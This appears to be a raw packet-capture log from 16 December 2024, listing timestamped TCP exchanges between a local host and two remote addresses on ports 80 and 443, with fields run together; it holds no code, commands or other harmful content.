                                                                                                                                                                                              Dec 16, 2024 01:01:23.693901062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.693943024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.693943024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.694998026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.695055008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.695791006 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.695847034 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.696173906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.696211100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.696229935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.696266890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.697365999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.697402954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.697422981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.697453022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.698575974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.698612928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.698633909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.698662043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.699680090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.699734926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.699810982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.699867010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.700845003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.700880051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.700901985 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.700933933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.702059031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.702116966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.702191114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.702245951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.703205109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.703263998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.703820944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.703876019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.704339981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.704396009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.705549002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.705585957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.705605030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.705636024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.705724001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.705790997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.706763029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.706823111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.707164049 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.707222939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.707881927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.707917929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.707937002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.707979918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.709027052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.709078074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.709883928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.709949970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.710207939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.710267067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.711383104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.711451054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.711473942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.711510897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.711536884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.711560011 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.712568045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.712629080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.713213921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.713264942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.713716030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.713766098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.714911938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.714948893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.714956999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.715002060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.715806961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.715857983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.716084957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.716121912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.716135979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.716172934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.717273951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.717324018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.717535973 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.717586040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.718408108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.718458891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.719022036 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.719072104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.719608068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.719645023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.719657898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.719690084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.720777035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.720828056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.721474886 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.721524954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.721924067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.721973896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.722302914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.722352982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.723089933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.723140955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.723225117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.723270893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.724317074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.724369049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.725445032 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.725481987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.725497961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.725529909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.725529909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.725574017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.726597071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.726660013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.727822065 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.727864027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.727890968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.727902889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.727910995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.727946043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.728951931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.729020119 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.730151892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.730186939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.730241060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.730271101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.730304956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.731306076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.731363058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.731434107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.731482983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.732461929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.732512951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.732580900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.732625961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.733653069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.733705044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.734821081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.734858990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.734872103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.734909058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.735367060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.735413074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.735964060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.736012936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.736040115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.736088991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745074987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745122910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745166063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745181084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745181084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745219946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745228052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.745284081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.746565104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.746618986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.746630907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.746675968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.747459888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.747524023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.747534990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.747591019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.749636889 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.749650955 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.749713898 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.749751091 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.749787092 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.834618092 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.834690094 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.834711075 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.834717989 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.834780931 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.834781885 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.855143070 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.871480942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.871561050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.871572971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.871625900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.872179985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.872235060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.872240067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.872286081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.872980118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.873044014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.873104095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.874150038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.874212980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.874289989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.874346972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.875349045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.875406981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.875449896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.875508070 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.876502037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.876562119 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.876622915 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.876681089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.877660036 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.877799034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.877859116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.878839970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.878897905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.878968000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.879019022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.879997969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.880055904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.880125046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.880182028 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.881181002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.881295919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.881354094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.882355928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.882414103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.882504940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.882560968 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.883517981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.883574963 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.883635044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.883690119 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.884717941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.884776115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.884831905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.884885073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.885855913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.886003971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.886075974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.887041092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.887104988 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.887137890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.887192011 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.888205051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.888262987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.888318062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.888379097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.889349937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.889408112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.889481068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.889535904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.890528917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.890646935 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.890706062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.891798019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.891860008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.891933918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.891992092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.892870903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.892929077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.893002987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.893064976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.894062042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.894190073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.894248962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.895220041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.895277977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.895356894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.895416975 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.896387100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.896445036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.896518946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.896574974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.897582054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.897646904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.897682905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.897733927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.898729086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.898780107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.898905993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.898956060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.899898052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.899949074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.900036097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.900087118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.901077986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.901139021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.901196957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.901258945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.902234077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.902367115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.902430058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.903419971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.903480053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.903552055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.903609037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.904593945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.904649973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.904711962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.904768944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.905751944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.905868053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.905926943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.906929016 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.906987906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.907062054 CET804980031.41.244.11192.168.2.4
